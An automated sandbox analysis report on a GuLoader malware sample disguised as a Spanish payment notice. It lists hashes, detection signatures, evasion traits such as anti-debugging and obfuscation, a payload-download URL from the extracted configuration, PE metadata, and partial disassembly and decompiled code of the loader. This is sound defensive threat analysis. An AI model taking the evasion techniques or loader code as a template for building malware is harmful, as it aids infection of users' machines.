Play interactive tour

Edit tour

Windows Analysis Report Confirming - Aviso de pago.exe

Overview

General Information

Sample Name:	Confirming - Aviso de pago.exe
Analysis ID:	531043
MD5:	660a906018931ad7d39aaaf72b0b8e58
SHA1:	adc917568cdfb8dea81c2f5793f69720609ee086
SHA256:	520c53fa3cc5121f1a8ab6600e9ee4cbe40d0f61712a4fc062c9db02953f5420
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Detected potential crypto function

Classification

Process Tree

System is w10x64

Confirming - Aviso de pago.exe (PID: 5756 cmdline: "C:\Users\user\Desktop\Confirming - Aviso de pago.exe" MD5: 660A906018931AD7D39AAAF72B0B8E58)

conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download"}

Source: Confirming - Aviso de pago.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download

Source: Confirming - Aviso de pago.exe, 00000000.00000002.1192776677.000000000064A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: Confirming - Aviso de pago.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Confirming - Aviso de pago.exe, 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGrammatikklassen.exe vs Confirming - Aviso de pago.exe
Source: Confirming - Aviso de pago.exe, 00000000.00000002.1193046924.0000000002AC0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameGrammatikklassen.exeFE2X vs Confirming - Aviso de pago.exe
Source: Confirming - Aviso de pago.exe	Binary or memory string: OriginalFilenameGrammatikklassen.exe vs Confirming - Aviso de pago.exe

Source: Confirming - Aviso de pago.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_0222D427	0_2_0222D427
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_0222E224	0_2_0222E224
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02234ACC	0_2_02234ACC
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02228FA3	0_2_02228FA3

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe

File created: C:\Users\user\AppData\Local\Temp\~DF90AE401F15B67D78.TMP

Jump to behavior

Source: Confirming - Aviso de pago.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: classification engine

Classification label: mal60.troj.winEXE@2/1@0/0

Source: unknown	Process created: C:\Users\user\Desktop\Confirming - Aviso de pago.exe "C:\Users\user\Desktop\Confirming - Aviso de pago.exe"
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_004048D5 pushfd ; retf	0_2_004048D7
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_00408774 push ebx; iretd	0_2_00408782
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_00408706 push ebx; iretd	0_2_00408782
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02221E64 push es; ret	0_2_02221E65
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02223D2B push 4B5B5F30h; iretd	0_2_02223D4C
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02223D7D push 4B5B5F30h; iretd	0_2_02223D4C

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe

Code function: 0_2_0222CA40 rdtsc

0_2_0222CA40

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02233034 mov eax, dword ptr fs:[00000030h]	0_2_02233034
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_0222C67F mov eax, dword ptr fs:[00000030h]	0_2_0222C67F
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02234ACC mov eax, dword ptr fs:[00000030h]	0_2_02234ACC
Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe	Code function: 0_2_02232727 mov eax, dword ptr fs:[00000030h]	0_2_02232727

Source: C:\Users\user\Desktop\Confirming - Aviso de pago.exe

Code function: 0_2_0222CA40 rdtsc

0_2_0222CA40

Source: Confirming - Aviso de pago.exe, 00000000.00000002.1192878554.0000000000DD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: Confirming - Aviso de pago.exe, 00000000.00000002.1192878554.0000000000DD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Confirming - Aviso de pago.exe, 00000000.00000002.1192878554.0000000000DD0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Confirming - Aviso de pago.exe, 00000000.00000002.1192878554.0000000000DD0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection2	Process Injection2	Input Capture1	Security Software Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	System Information Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531043
Start date:	30.11.2021
Start time:	10:19:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Confirming - Aviso de pago.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.troj.winEXE@2/1@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.5% (good quality ratio 23.6%) Quality average: 34.6% Quality standard deviation: 36.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF90AE401F15B67D78.TMP Download File
Process:	C:\Users\user\Desktop\Confirming - Aviso de pago.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.9866006611106688
Encrypted:	false
SSDEEP:	96:jWpahLKAycVxc4LlvnffSIPW0wLzzj1ylDHn3Rs:KMhLKCxV5vnffI0wIdHBs
MD5:	A256BBA112F7FA34FE9E19ED07D0DF83
SHA1:	3E86ADD7C0890C55E8F22334A3E26134D7AB1EE8
SHA-256:	AB9F6744C55428A62F4696BC1779409A30420D0983EDD5536A0D280DF5EE7FE0
SHA-512:	9E762DFE82611778602E8BF19439E48AF7278D3D9399FF44666EB8A196206F4B1B50B9B623710B138BD7A7E9C1E0A05BE85CE6FB7B0F208C9664669297C416EA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.072456251172297
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Confirming - Aviso de pago.exe
File size:	155648
MD5:	660a906018931ad7d39aaaf72b0b8e58
SHA1:	adc917568cdfb8dea81c2f5793f69720609ee086
SHA256:	520c53fa3cc5121f1a8ab6600e9ee4cbe40d0f61712a4fc062c9db02953f5420
SHA512:	614ce1f2f1a0e0933c732a6bd41173ddb54862347947182c71a95f04def137802cc90d6583a791db69e4f9305ff2e1ed96edbccbf170d8eb6f10cba3286e14c4
SSDEEP:	1536:dafJffdYUfpeAxZcswCVWHSBrO4efc1SAnGlrWAEEKLBl5l1TM03fJffpfJff:YfJffnMw7BrO4AMS8pOKb3fJffpfJff
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...d..V.....................P............... ....@................

File Icon


Icon Hash:	70ecccaececc71e2

Static PE Info

General
Entrypoint:	0x4015a8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56E5BC64 [Sun Mar 13 19:15:48 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	458ac857eb15a6ebaad7748f2f663dae

Entrypoint Preview

Instruction
push 00402DD8h
call 00007FBC38DCC2C5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], dl
retn 5C60h
insb
or ah, ah
dec esi
mov ecx, 217C0FE5h
mov edx, 00008AAEh
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
and byte ptr [41502220h], bh
push esi
inc ebp
dec esp
push ebx
inc ebp
push ebx
dec edi
push esi
inc ebp
push edx
push ebx
dec ecx
inc edi
push esp
inc ebp
push edx
add byte ptr [ecx+65h], ch
outsb
je 00007FBC38DCC31Ah
imul eax, dword ptr [eax], FF000000h
int3
xor dword ptr [eax], eax
add eax, B5AE47A2h
or byte ptr [eax-3849B9F2h], 00000015h
dec esp
mov al, ECh
xor ebx, eax
mov bh, 18h
sbb dword ptr [ecx-6CB9C804h], edi
mov word ptr [ebp+1BF45548h], gs
dec esi
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jnbe 00007FBC38DCC2E8h
add byte ptr [eax], al
lea edx, dword ptr [08000000h]
add byte ptr [ebx+65h], al
insb
bound esp, dword ptr [ebp+72h]
add byte ptr [00000B01h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x213c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x2f4c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x194	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20998	0x21000	False	0.357577237216	data	5.23763922867	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x1250	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x2f4c	0x3000	False	0.232991536458	data	4.21003728308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x259b2	0x1542	data	English	United States
RT_ICON	0x2490a	0x10a8	data
RT_ICON	0x244a2	0x468	GLS_BINARY_LSB_FIRST
RT_STRING	0x26ef4	0x58	data	English	United States
RT_GROUP_ICON	0x24480	0x22	data
RT_VERSION	0x241c0	0x2c0	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarTstGt, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaPrintObj, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Corps
InternalName	Grammatikklassen
FileVersion	1.00
CompanyName	Corps
LegalTrademarks	Corps
ProductName	Corps
ProductVersion	1.00
FileDescription	Corps
OriginalFilename	Grammatikklassen.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Confirming - Aviso de pago.exe PID: 5756 Parent PID: 5960

General

Start time:	10:20:30
Start date:	30/11/2021
Path:	C:\Users\user\Desktop\Confirming - Aviso de pago.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Confirming - Aviso de pago.exe"
Imagebase:	0x400000
File size:	155648 bytes
MD5 hash:	660A906018931AD7D39AAAF72B0B8E58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6104 Parent PID: 5756

General

Start time:	10:20:31
Start date:	30/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Confirming - Aviso de pago.exe PID: 5756 Parent PID: 5960 Confirming - Aviso de pago.exeCOMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	12%
Signature Coverage:	7.7%
Total number of Nodes:	443
Total number of Limit Nodes:	50

Executed Functions

Function 0041CDE4, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041CDE4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v40;
				void* _v44;
				void* _v48;
				short _v52;
				void* _v56;
				void* _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				short _v76;
				void* _v80;
				char _v96;
				char _v100;
				void* _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char _v172;
				char _v176;
				char* _v184;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				intOrPtr* _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				intOrPtr* _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				intOrPtr* _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				intOrPtr* _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				intOrPtr* _v408;
				signed int _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				intOrPtr* _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				intOrPtr* _v496;
				signed int _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t894;
				char* _t898;
				char* _t902;
				signed int _t906;
				signed int _t910;
				signed int _t914;
				signed int _t918;
				signed int _t922;
				signed int _t926;
				signed int _t944;
				signed int _t948;
				signed int _t957;
				signed int _t961;
				signed int _t965;
				signed int _t969;
				signed int _t973;
				signed int _t977;
				signed int _t981;
				signed int _t995;
				signed int _t1000;
				signed int _t1004;
				signed int _t1008;
				signed int _t1012;
				signed int _t1028;
				signed int _t1032;
				signed int _t1037;
				signed int _t1041;
				signed int _t1045;
				signed int _t1049;
				signed int _t1068;
				signed int _t1072;
				signed int _t1076;
				signed int _t1080;
				signed int _t1088;
				signed int _t1095;
				signed int _t1099;
				signed int _t1103;
				signed int _t1107;
				signed int _t1112;
				signed int _t1116;
				char* _t1120;
				signed int _t1124;
				char* _t1128;
				signed int _t1141;
				signed int _t1145;
				char* _t1149;
				signed int _t1163;
				signed int _t1167;
				signed int _t1174;
				signed int _t1180;
				char* _t1182;
				signed int _t1186;
				signed int _t1190;
				signed int _t1194;
				signed int _t1198;
				signed int* _t1199;
				char* _t1200;
				signed int _t1211;
				signed int _t1215;
				signed int _t1219;
				signed int _t1223;
				char* _t1224;
				char* _t1225;
				signed int _t1238;
				signed int _t1242;
				signed int _t1256;
				signed int _t1260;
				signed int _t1264;
				signed int _t1268;
				signed int _t1279;
				signed int _t1284;
				signed int _t1289;
				signed int _t1293;
				void* _t1434;
				void* _t1436;
				intOrPtr _t1437;
				void* _t1438;
				void* _t1452;

				_t1437 = _t1436 - 0x18;
				 *[fs:0x0] = _t1437;
				L00401350();
				_v28 = _t1437;
				_v24 = 0x401198;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t1434);
				_v8 = 1;
				_v8 = 2;
				_push(L"Bovlamme1");
				_push(L"Unecliptic9");
				_push( &_v156); // executed
				L00401584(); // executed
				_v184 = L"stivstikkere";
				_v192 = 0x8008;
				_push( &_v156);
				_t894 =  &_v192;
				_push(_t894);
				L0040158A();
				_v236 = _t894;
				L0040157E();
				if(_v236 != 0) {
					_v8 = 3;
					if( *0x4223fc != 0) {
						_v308 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v308 = 0x4223fc;
					}
					_v236 =  *_v308;
					_t1279 =  *((intOrPtr*)( *_v236 + 0x14))(_v236,  &_v124);
					asm("fclex");
					_v240 = _t1279;
					if(_v240 >= 0) {
						_v312 = _v312 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v312 = _t1279;
					}
					_v244 = _v124;
					_t1284 =  *((intOrPtr*)( *_v244 + 0x108))(_v244,  &_v196);
					asm("fclex");
					_v248 = _t1284;
					if(_v248 >= 0) {
						_v316 = _v316 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x403c80);
						_push(_v244);
						_push(_v248);
						L00401572();
						_v316 = _t1284;
					}
					_v52 = _v196;
					L0040156C();
					_v8 = 4;
					if( *0x422010 != 0) {
						_v320 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v320 = 0x422010;
					}
					_t1289 =  &_v124;
					L00401566();
					_v236 = _t1289;
					_t1293 =  *((intOrPtr*)( *_v236 + 0x158))(_v236,  &_v108, _t1289,  *((intOrPtr*)( *((intOrPtr*)( *_v320)) + 0x300))( *_v320));
					asm("fclex");
					_v240 = _t1293;
					if(_v240 >= 0) {
						_v324 = _v324 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403c90);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v324 = _t1293;
					}
					_push(0x87);
					_push(_v108);
					L0040155A();
					L00401560();
					L00401554();
					L0040156C();
				}
				_v8 = 6;
				_v148 = 0x80020004;
				_v156 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v156);
				_push(L"Tosdede8");
				_push( &_v172);
				L00401542();
				_t898 =  &_v172;
				_push(_t898);
				_push(0x2008);
				L00401548();
				_v224 = _t898;
				_push( &_v224);
				_push( &_v68);
				L0040154E();
				_push( &_v172);
				_t902 =  &_v156;
				_push(_t902);
				_push(2);
				L0040153C();
				_t1438 = _t1437 + 0xc;
				_v8 = 7;
				E00403A9C(); // executed
				_v224 = _t902;
				L00401536();
				if(_v224 == 0x22d3bf) {
					_v8 = 8;
					_push(L"phrontisterium");
					L00401530();
					L00401560();
					_v8 = 9;
					if( *0x422010 != 0) {
						_v328 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v328 = 0x422010;
					}
					_t1186 =  &_v124;
					L00401566();
					_v236 = _t1186;
